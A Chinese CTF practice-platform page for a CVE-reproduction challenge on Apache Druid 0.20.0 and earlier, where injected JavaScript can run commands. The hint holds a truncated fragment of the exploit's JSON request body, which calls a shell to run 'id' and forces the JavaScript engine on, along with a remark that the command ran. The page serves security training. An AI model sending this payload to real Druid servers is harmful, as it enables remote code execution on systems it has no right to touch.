Apache-druid
CVE复现 困难
题目描述:

Apache Druid包括执行嵌入在各种类型请求中的用户提供的JavaScript代码的能力。这个功能是为了在可信环境下使用,并且默认是禁用的。然而,在Druid 0.20.0及以前的版本中,攻击者可以通过发送一个恶意请求使Druid用内置引擎执行任意JavaScript代码,而不管服务器配置如何,这将导致代码和命令执行漏洞。

题目提示:

sh",""-c",""id""]).getInputStream()).useDelimiter(""A"").next();return {timestamp:123123,test: a}}",
"":{
"enabled":"true"
}
}
}
}
},
"samplerConfig":{
"numRows":10
}
}
```

可见,id命令已被成功执行:

作者

snow

解题次数

0

一血

暂无

消耗金币

0

分数

100

最高奖励

0

创建题目环境
您尚未登录,请 登录注册 后评论
    0 人参与 | 0 条评论
    暂时没有评论,欢迎来讨论!
个人空间
创建题目

创建题目

 竞赛列表

竞赛列表

 创建比赛

创建比赛
0

题目

0

解题

0

分数

0

金币

最近解题
学习岛
任意文件读取 反序列化 命令执行 SSRF 本地靶场 SQL注入 代码审计 代码执行 命令注入 文件上传 权限提升 签到
分数排行
题目动态